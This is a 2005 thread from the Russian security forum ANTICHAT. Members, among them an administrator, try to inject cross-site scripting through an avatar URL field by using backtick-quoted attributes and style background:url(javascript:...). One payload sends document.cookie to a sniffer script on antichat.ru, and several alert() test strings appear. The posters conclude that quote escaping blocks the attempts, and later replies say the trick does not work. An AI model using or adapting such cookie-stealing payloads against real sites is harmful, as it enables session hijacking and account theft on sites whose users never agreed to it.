ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|

15.01.2005, 17:47
|
|
Администратор
Регистрация: 05.10.2003
Сообщений: 1,083
Провел на форуме: 4618051
Репутация:
45
|
|
Сообщение от b00
Ой ли. У меня на форуме кавычки спокойно квотируются:
<img src="http://avatar.com/x.jpg" bb=" http://antichat.ru
А так проходит?
Код:
http://www.smailiki.nm.ru/lam/lam4.gif` bb=`http://antichat.ru/cgi-bin/s.jpg?` style=`background:url(javascript:document.images[0].src=this.bb+document.cookie)
Последний раз редактировалось Че Гевара; 15.01.2005 в 18:20..
|
|
|

15.01.2005, 17:57
|
|
Новичок
Регистрация: 15.01.2005
Сообщений: 4
Провел на форуме: 0
Репутация:
0
|
|
Сообщение от Че Гевара
А так проходит?
Код:
http://www.smailiki.nm.ru/lam/lam4.gif` bb=`http://antichat.ru/cgi-bin/s.jpg?` style=`background:url(javascript:document.images[0].src=this.bb+document.cookie)
такая длинная конструкция - нет 
<img src="http://aaa.bb/x.gif` bb=`http://antichat.ru/cgi-bin/s.jpg?` style=`background:url(javascript :documen" alt="" /><br />
Да и админы уже года 2 IE не юзают 
|
|
|

15.01.2005, 18:58
|
|
Новичок
Регистрация: 15.01.2005
Сообщений: 4
Провел на форуме: 0
Репутация:
0
|
|
загнал в аватар тестовую строку
<img src="http://abc.ru/x.gif` style=`background:url(javascript:alert())" alt="" border="0" /><br /><br />
в IE не отработало
|
|
|

15.01.2005, 19:53
|
|
Администратор
Регистрация: 05.10.2003
Сообщений: 1,083
Провел на форуме: 4618051
Репутация:
45
|
|
Он и не сработает ... Я что-то перемудрил по ходу дела....
По идее, сработает он в таком случае:
Код:
<img src="http://abc.ru/x.gif"style=background-image:url(javascript:alert()) alt="" border="0">
Но т.к. кавычки преобразуются, то он тоже не сработает ...)
Сейчас подумаем еще ...
|
|
|

15.01.2005, 20:03
|
|
Участник форума
Регистрация: 11.12.2004
Сообщений: 242
Провел на форуме: 144460
Репутация:
39
|
|
вот смотрю на вас и не знаю че сказать...
|
|
|

15.01.2005, 20:14
|
|
Администратор
Регистрация: 05.10.2003
Сообщений: 1,083
Провел на форуме: 4618051
Репутация:
45
|
|
Как бы Егор меня не путал, по идее оба скрипта синтаксически верны:
Код:
<img src="http://abc.ru/x.gif"style=background-image:url(javascript:alert('1')) alt="" border="0">
<img src=`http://abc.ru/x.gif`style=background-image:url(javascript:alert('2')) alt="" border="0">
И вот в чем была моя ошибка и чего я не учел:
Аватара отображается как
Код:
<img src="http:/site/1.jpg" alt="" border="0" />
И само собой разумеется, что я предложил синтаксически неверно (в нашем случае):
Код:
http://www.smailiki.nm.ru/lam/lam4.gif` bb=`http://antichat.ru/cgi-bin/s.jpg?` style=`background:url(javascript:document.images[0].src=this.bb+document.cookie)
Все это преобразуется в <img src=" http://www.smailiki.nm.ru/lam/lam4.gif` .... ... что является галиматьей полной и естесственно не сработает ...
Получается - раз кавычки преобразуются в " , то за пределы <img src="... никуда не выйти ...
Извиняюсь за свою ошибку - просто я не вчитался в тему ...
Последний раз редактировалось Че Гевара; 15.01.2005 в 20:18..
|
|
|

15.01.2005, 20:42
|
|
Новичок
Регистрация: 15.01.2005
Сообщений: 4
Провел на форуме: 0
Репутация:
0
|
|
Ничего, со всякими случается.
|
|
|

25.01.2005, 00:09
|
|
Участник форума
Регистрация: 16.09.2004
Сообщений: 193
Провел на форуме: 621131
Репутация:
47
|
|
Не работает...
пишет:
Файл по указанному вами Url не содержит данных
чё не так?...
|
|
|

25.01.2005, 15:51
|
|
Постоянный
Регистрация: 22.01.2005
Сообщений: 764
Провел на форуме: 1086047
Репутация:
67
|
|
да, попадается...
может на новых версиях не рубит фишка?
|
|
|

04.02.2005, 16:20
|
|
Новичок
Регистрация: 31.01.2005
Сообщений: 13
Провел на форуме: 0
Репутация:
0
|
|
Дак а какой вариант верный??? 
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|